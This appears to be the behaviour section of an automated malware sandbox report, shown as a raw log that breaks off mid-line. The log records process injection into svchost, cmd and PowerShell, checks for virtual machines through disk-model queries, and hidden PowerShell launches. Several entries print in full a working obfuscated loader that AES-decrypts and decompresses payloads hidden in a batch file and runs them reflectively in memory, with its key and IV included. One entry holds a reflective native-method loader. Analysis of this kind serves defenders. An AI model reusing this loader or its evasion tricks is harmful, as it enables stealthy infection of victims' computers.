Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: A40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: EC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1100000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 8C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: FA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 900000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 9A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1010000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1430000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 8E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1230000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 115765F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 870000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17E36BD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 970000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 204616A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 760000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1F119790000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: DD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1100000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 166BBF70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 22F3FF70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20DDFFA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 570000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 8E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: FC0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 640000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: A40000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 1100000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XTFkghCxHZBbigfTAgwlacPeETrAVDLSYMLbNtRpuyEHUzzqXMEXSZzlwFSzgUMGyMGaFMNf\QITyRWANnafTxbLOJyEKzWcn.exe base: 8E0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 115765F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17E36BD0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 204616A0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1F119790000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 166BBF70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 22F3FF70000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20DDFFA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 242A6F30000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 242A7150000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1DEE3460000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1BF02230000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1A607DB0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1A621FA0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1F96B9C0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1F96B9F0000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1FD93340000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C2F9800000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 187E4760000
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C2FBA00000
Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 11576220000
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get ModelJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i "DADY HARDDISK QEMU HARDDISK WDS100T2B0A" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function nTIwb($oVJGU){ $dmvwb=[System.Security.Cryptography.Aes]::Create(); $dmvwb.Mode=[System.Security.Cryptography.CipherMode]::CBC; $dmvwb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $dmvwb.Key=[System.Convert]::FromBase64String('q/epIFuUiTeZPvuXMOrJUZKEDTokijbasPqPVgeuzIY='); $dmvwb.IV=[System.Convert]::FromBase64String('2eFTLv8XY+wg1Xp7cznzrQ=='); $bbzAD=$dmvwb.CreateDecryptor(); $hLXQZ=$bbzAD.TransformFinalBlock($oVJGU, 0, $oVJGU.Length); $bbzAD.Dispose(); $dmvwb.Dispose(); $hLXQZ;}function hCkUZ($oVJGU){ Invoke-Expression '$VRbTd=New-Object oniSoniyonisonitonieonimoni.oniIoniOoni.oniMonieonimonioonironiyStonironieoniamoni(,$oVJGU);'.Replace('oni', ''); Invoke-Expression '$GbZBJ=New-Object oniSoniyonisonitonieonim.oniIoniOoni.MonieonimonioonironiyoniSonitonironieoniaonimoni;'.Replace('oni', ''); Invoke-Expression '$qvkjb=New-Object Soniyonisonitonieonimoni.oniIoniOoni.oniConioonimoniponironieonissoniiooninoni.GoniZioniponiSonitonironieoniaonimoni($VRbTd, [oniIoniOoni.oniConioonimoniponironieonisonisoniioniooninoni.oniConioonimoniponironieonisonisoniioniooninoniMonioonidonieoni]::Donieconiomoniproniesonis);'.Replace('oni', ''); $qvkjb.CopyTo($GbZBJ); $qvkjb.Dispose(); $VRbTd.Dispose(); $GbZBJ.Dispose(); $GbZBJ.ToArray();}function uFDAH($oVJGU,$FJSeL){ Invoke-Expression '$qHIdZ=oni[oniSoniyonisonitonieonimoni.oniRonieonifonilonieoniconitoniioniooninoni.oniAonisonisonieonimoniboniloniyoni]oni::oniLoniooniaonidoni([byte[]]$oVJGU);'.Replace('oni', ''); Invoke-Expression '$eNoQZ=$qHIdZ.oniEoninonitonironiyoniPoniooniioninonitoni;'.Replace('oni', ''); Invoke-Expression '$eNoQZ.oniIoninonivonioonikonieoni(oni$oninoniuoniloniloni, $FJSeL)oni;'.Replace('oni', '');}$DNWGy = 'C:\Users\user\Desktop\Q5N7WOpk8J.bat';$host.UI.RawUI.WindowTitle = $DNWGy;$YMRTG=[System.IO.File]::ReadAllText($DNWGy).Split([Environment]::NewLine);foreach ($kGLHr in $YMRTG) { if ($kGLHr.StartsWith(':: ')) { $qObbT=$kGLHr.Substring(3); break; }}$UCMwf=[string[]]$qObbT.Split('\');Invoke-Expression '$oOAsD=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[0])));'.Replace('oni', '');Invoke-Expression '$OwBFa=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[1])));'.Replace('oni', '');uFDAH $oOAsD $null;uFDAH $OwBFa (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$cnt-onimai2\$cnt-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$cnt-onimai2\$cnt-CO2.bat' -WindowStyle Hidden "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$cnt-onimai2\$cnt-CO2.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get ModelJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i "DADY HARDDISK QEMU HARDDISK WDS100T2B0A" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function nTIwb($oVJGU){ $dmvwb=[System.Security.Cryptography.Aes]::Create(); $dmvwb.Mode=[System.Security.Cryptography.CipherMode]::CBC; $dmvwb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $dmvwb.Key=[System.Convert]::FromBase64String('q/epIFuUiTeZPvuXMOrJUZKEDTokijbasPqPVgeuzIY='); $dmvwb.IV=[System.Convert]::FromBase64String('2eFTLv8XY+wg1Xp7cznzrQ=='); $bbzAD=$dmvwb.CreateDecryptor(); $hLXQZ=$bbzAD.TransformFinalBlock($oVJGU, 0, $oVJGU.Length); $bbzAD.Dispose(); $dmvwb.Dispose(); $hLXQZ;}function hCkUZ($oVJGU){ Invoke-Expression '$VRbTd=New-Object oniSoniyonisonitonieonimoni.oniIoniOoni.oniMonieonimonioonironiyStonironieoniamoni(,$oVJGU);'.Replace('oni', ''); Invoke-Expression '$GbZBJ=New-Object oniSoniyonisonitonieonim.oniIoniOoni.MonieonimonioonironiyoniSonitonironieoniaonimoni;'.Replace('oni', ''); Invoke-Expression '$qvkjb=New-Object Soniyonisonitonieonimoni.oniIoniOoni.oniConioonimoniponironieonissoniiooninoni.GoniZioniponiSonitonironieoniaonimoni($VRbTd, [oniIoniOoni.oniConioonimoniponironieonisonisoniioniooninoni.oniConioonimoniponironieonisonisoniioniooninoniMonioonidonieoni]::Donieconiomoniproniesonis);'.Replace('oni', ''); $qvkjb.CopyTo($GbZBJ); $qvkjb.Dispose(); $VRbTd.Dispose(); $GbZBJ.Dispose(); $GbZBJ.ToArray();}function uFDAH($oVJGU,$FJSeL){ Invoke-Expression '$qHIdZ=oni[oniSoniyonisonitonieonimoni.oniRonieonifonilonieoniconitoniioniooninoni.oniAonisonisonieonimoniboniloniyoni]oni::oniLoniooniaonidoni([byte[]]$oVJGU);'.Replace('oni', ''); Invoke-Expression '$eNoQZ=$qHIdZ.oniEoninonitonironiyoniPoniooniioninonitoni;'.Replace('oni', ''); Invoke-Expression '$eNoQZ.oniIoninonivonioonikonieoni(oni$oninoniuoniloniloni, $FJSeL)oni;'.Replace('oni', '');}$DNWGy = 'C:\Windows\$cnt-onimai2\$cnt-CO2.bat';$host.UI.RawUI.WindowTitle = $DNWGy;$YMRTG=[System.IO.File]::ReadAllText($DNWGy).Split([Environment]::NewLine);foreach ($kGLHr in $YMRTG) { if ($kGLHr.StartsWith(':: ')) { $qObbT=$kGLHr.Substring(3); break; }}$UCMwf=[string[]]$qObbT.Split('\');Invoke-Expression '$oOAsD=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[0])));'.Replace('oni', '');Invoke-Expression '$OwBFa=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[1])));'.Replace('oni', '');uFDAH $oOAsD $null;uFDAH $OwBFa (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$cnt-CNT1" /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{613480bb-0e59-44d7-94a6-0c4ff8614e86}Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function ntiwb($ovjgu){ $dmvwb=[system.security.cryptography.aes]::create(); $dmvwb.mode=[system.security.cryptography.ciphermode]::cbc; $dmvwb.padding=[system.security.cryptography.paddingmode]::pkcs7; $dmvwb.key=[system.convert]::frombase64string('q/epifuuitezpvuxmorjuzkedtokijbaspqpvgeuziy='); $dmvwb.iv=[system.convert]::frombase64string('2eftlv8xy+wg1xp7cznzrq=='); $bbzad=$dmvwb.createdecryptor(); $hlxqz=$bbzad.transformfinalblock($ovjgu, 0, $ovjgu.length); $bbzad.dispose(); $dmvwb.dispose(); $hlxqz;}function hckuz($ovjgu){ invoke-expression '$vrbtd=new-object onisoniyonisonitonieonimoni.oniioniooni.onimonieonimonioonironiystonironieoniamoni(,$ovjgu);'.replace('oni', ''); invoke-expression '$gbzbj=new-object onisoniyonisonitonieonim.oniioniooni.monieonimonioonironiyonisonitonironieoniaonimoni;'.replace('oni', ''); invoke-expression '$qvkjb=new-object soniyonisonitonieonimoni.oniioniooni.oniconioonimoniponironieonissoniiooninoni.gonizioniponisonitonironieoniaonimoni($vrbtd, [oniioniooni.oniconioonimoniponironieonisonisoniioniooninoni.oniconioonimoniponironieonisonisoniioniooninonimonioonidonieoni]::donieconiomoniproniesonis);'.replace('oni', ''); $qvkjb.copyto($gbzbj); $qvkjb.dispose(); $vrbtd.dispose(); $gbzbj.dispose(); $gbzbj.toarray();}function ufdah($ovjgu,$fjsel){ invoke-expression '$qhidz=oni[onisoniyonisonitonieonimoni.onironieonifonilonieoniconitoniioniooninoni.oniaonisonisonieonimoniboniloniyoni]oni::oniloniooniaonidoni([byte[]]$ovjgu);'.replace('oni', ''); invoke-expression '$enoqz=$qhidz.onieoninonitonironiyoniponiooniioninonitoni;'.replace('oni', ''); invoke-expression '$enoqz.oniioninonivonioonikonieoni(oni$oninoniuoniloniloni, $fjsel)oni;'.replace('oni', '');}$dnwgy = 'c:\users\user\desktop\q5n7wopk8j.bat';$host.ui.rawui.windowtitle = $dnwgy;$ymrtg=[system.io.file]::readalltext($dnwgy).split([environment]::newline);foreach ($kglhr in $ymrtg) { if ($kglhr.startswith(':: ')) { $qobbt=$kglhr.substring(3); break; }}$ucmwf=[string[]]$qobbt.split('\');invoke-expression '$ooasd=hckuz (ntiwb (oni[oniconiooninonivonieonironitoni]oni:oni:onifonironioonimoniboniaonisonieoni6oni4onisonitonironiioninonigoni($ucmwf[0])));'.replace('oni', '');invoke-expression '$owbfa=hckuz (ntiwb (oni[oniconiooninonivonieonironitoni]oni:oni:onifonironioonimoniboniaonisonieoni6oni4onisonitonironiioninonigoni($ucmwf[1])));'.replace('oni', '');ufdah $ooasd $null;ufdah $owbfa (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function ntiwb($ovjgu){ $dmvwb=[system.security.cryptography.aes]::create(); $dmvwb.mode=[system.security.cryptography.ciphermode]::cbc; $dmvwb.padding=[system.security.cryptography.paddingmode]::pkcs7; $dmvwb.key=[system.convert]::frombase64string('q/epifuuitezpvuxmorjuzkedtokijbaspqpvgeuziy='); $dmvwb.iv=[system.convert]::frombase64string('2eftlv8xy+wg1xp7cznzrq=='); $bbzad=$dmvwb.createdecryptor(); $hlxqz=$bbzad.transformfinalblock($ovjgu, 0, $ovjgu.length); $bbzad.dispose(); $dmvwb.dispose(); $hlxqz;}function hckuz($ovjgu){ invoke-expression '$vrbtd=new-object onisoniyonisonitonieonimoni.oniioniooni.onimonieonimonioonironiystonironieoniamoni(,$ovjgu);'.replace('oni', ''); invoke-expression '$gbzbj=new-object onisoniyonisonitonieonim.oniioniooni.monieonimonioonironiyonisonitonironieoniaonimoni;'.replace('oni', ''); invoke-expression '$qvkjb=new-object soniyonisonitonieonimoni.oniioniooni.oniconioonimoniponironieonissoniiooninoni.gonizioniponisonitonironieoniaonimoni($vrbtd, [oniioniooni.oniconioonimoniponironieonisonisoniioniooninoni.oniconioonimoniponironieonisonisoniioniooninonimonioonidonieoni]::donieconiomoniproniesonis);'.replace('oni', ''); $qvkjb.copyto($gbzbj); $qvkjb.dispose(); $vrbtd.dispose(); $gbzbj.dispose(); $gbzbj.toarray();}function ufdah($ovjgu,$fjsel){ invoke-expression '$qhidz=oni[onisoniyonisonitonieonimoni.onironieonifonilonieoniconitoniioniooninoni.oniaonisonisonieonimoniboniloniyoni]oni::oniloniooniaonidoni([byte[]]$ovjgu);'.replace('oni', ''); invoke-expression '$enoqz=$qhidz.onieoninonitonironiyoniponiooniioninonitoni;'.replace('oni', ''); invoke-expression '$enoqz.oniioninonivonioonikonieoni(oni$oninoniuoniloniloni, $fjsel)oni;'.replace('oni', '');}$dnwgy = 'c:\windows\$cnt-onimai2\$cnt-co2.bat';$host.ui.rawui.windowtitle = $dnwgy;$ymrtg=[system.io.file]::readalltext($dnwgy).split([environment]::newline);foreach ($kglhr in $ymrtg) { if ($kglhr.startswith(':: ')) { $qobbt=$kglhr.substring(3); break; }}$ucmwf=[string[]]$qobbt.split('\');invoke-expression '$ooasd=hckuz (ntiwb (oni[oniconiooninonivonieonironitoni]oni:oni:onifonironioonimoniboniaonisonieoni6oni4onisonitonironiioninonigoni($ucmwf[0])));'.replace('oni', '');invoke-expression '$owbfa=hckuz (ntiwb (oni[oniconiooninonivonieonironitoni]oni:oni:onifonironioonimoniboniaonisonieoni6oni4onisonitonironiioninonigoni($ucmwf[1])));'.replace('oni', '');ufdah $ooasd $null;ufdah $owbfa (,[string[]] (''));
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:oxbndidjmsmp{param([outputtype([type])][parameter(position=0)][type[]]$kemhnhdqclrunv,[parameter(position=1)][type]$hgdpxlkyuq)$khfifhqytpa=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname(''+[char](82)+'e'+'f'+''+[char](108)+''+'e'+'c'+'t'+'e'+'d'+''+[char](68)+''+[char](101)+'l'+[char](101)+''+'g'+''+[char](97)+''+[char](116)+''+'e'+'')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule(''+'i'+''+'n'+''+'m'+'e'+[char](109)+''+'o'+''+[char](114)+''+'y'+''+'m'+''+[char](111)+''+'d'+''+[char](117)+'le',$false).definetype(''+[char](77)+'yd'+'e'+''+'l'+''+[char](101)+''+'g'+'a'+[char](116)+''+[char](101)+''+'t'+''+'y'+''+'p'+''+'e'+'',''+[char](67)+''+[char](108)+''+[char](97)+''+[char](115)+''+[char](115)+''+[char](44)+'p'+[char](117)+''+'b'+''+'l'+''+[char](105)+''+'c'+''+','+''+[char](83)+'e'+[char](97)+'l'+'e'+''+[char](100)+''+','+''+[char](65)+''+[char](110)+''+'s'+''+'i'+'c'+[char](108)+'a'+[char](115)+''+'s'+''+','+''+'a'+''+[char](117)+'t'+[char](111)+'cla'+[char](115)+''+'s'+'',[multicastdelegate]);$khfifhqytpa.defineconstructor(''+[char](82)+''+[char](84)+''+[char](83)+'p'+[char](101)+'c'+[char](105)+'al'+[char](78)+''+'a'+''+[char](109)+''+[char](101)+''+[char](44)+''+[char](72)+''+[char](105)+''+[char](100)+''+[char](101)+''+[char](66)+''+[char](121)+''+'s'+''+[char](105)+''+'g'+','+'p'+'u'+'b'+''+[char](108)+''+[char](105)+''+[char](99)+'',[reflection.callingconventions]::standard,$kemhnhdqclrunv).setimplementationflags(''+'r'+''+[char](117)+'n'+'t'+''+'i'+''+[char](109)+''+'e'+''+[char](44)+'m'+'a'+''+'n'+'ag'+'e'+''+[char](100)+'');$khfifhqytpa.definemethod(''+[char](73)+'n'+[char](118)+''+'o'+''+'k'+''+[char](101)+'',''+[char](80)+'u'+[char](98)+'l'+'i'+''+[char](99)+''+[char](44)+'h'+'i'+''+[char](100)+''+[char](101)+''+[char](66)+''+'y'+''+[char](83)+''+'i'+''+[char](103)+',n'+'e'+''+[char](119)+'s'+[char](108)+''+[char](111)+''+[char](116)+''+[char](44)+''+'v'+''+[char](105)+'r'+[char](116)+'ua'+[char](108)+'',$hgdpxlkyuq,$kemhnhdqclrunv).setimplementationflags(''+[char](82)+''+[char](117)+'n'+[char](116)+'i'+'m'+''+[char](101)+''+','+''+[char](77)+''+[char](97)+''+'n'+'a'+'g'+''+[char](101)+''+[char](100)+'');write-output $khfifhqytpa.createtype();}$krrkxmmjhqawa=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals(''+[char](83)+''+'y'+''+[char](115)+''+[char](116)+''+[char](101)+''+'m'+''+[char](46)+''+[char](100)+'ll')}).gettype(''+'m'+''+'i'+''+'c'+''+'r'+'o'+[char](115)+''+'o'+''+[char](102)+''+[char](116)+'.'+[char](87)+''+[char](105)+''+[char](110)+''+[char](51)+''+[char](50)+'.un'+[char](115)+'a'+'f'+''+'e'+'n'+[char](97)+''+[char](116)+''+'i'+''+[char](118)+''+[char](101)+''+[char](77)+''+[char](101)+''+'t'+''+[char](104)+''+'o'+''+'d'+''+'s'+'');$dozkqfpbzxnlsh=$krrkxmmjhqaw
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function ntiwb($ovjgu){ $dmvwb=[system.security.cryptography.aes]::create(); $dmvwb.mode=[system.security.cryptography.ciphermode]::cbc; $dmvwb.padding=[system.security.cryptography.paddingmode]::pkcs7; $dmvwb.key=[system.convert]::frombase64string('q/epifuuitezpvuxmorjuzkedtokijbaspqpvgeuziy='); $dmvwb.iv=[system.convert]::frombase64string('2eftlv8xy+wg1xp7cznzrq=='); $bbzad=$dmvwb.createdecryptor(); $hlxqz=$bbzad.transformfinalblock($ovjgu, 0, $ovjgu.length); $bbzad.dispose(); $dmvwb.dispose(); $hlxqz;}function hckuz($ovjgu){ invoke-expression '$vrbtd=new-object onisoniyonisonitonieonimoni.oniioniooni.onimonieonimonioonironiystonironieoniamoni(,$ovjgu);'.replace('oni', ''); invoke-expression '$gbzbj=new-object onisoniyonisonitonieonim.oniioniooni.monieonimonioonironiyonisonitonironieoniaonimoni;'.replace('oni', ''); invoke-expression '$qvkjb=new-object soniyonisonitonieonimoni.oniioniooni.oniconioonimoniponironieonissoniiooninoni.gonizioniponisonitonironieoniaonimoni($vrbtd, [oniioniooni.oniconioonimoniponironieonisonisoniioniooninoni.oniconioonimoniponironieonisonisoniioniooninonimonioonidonieoni]::donieconiomoniproniesonis);'.replace('oni', ''); $qvkjb.copyto($gbzbj); $qvkjb.dispose(); $vrbtd.dispose(); $gbzbj.dispose(); $gbzbj.toarray();}function 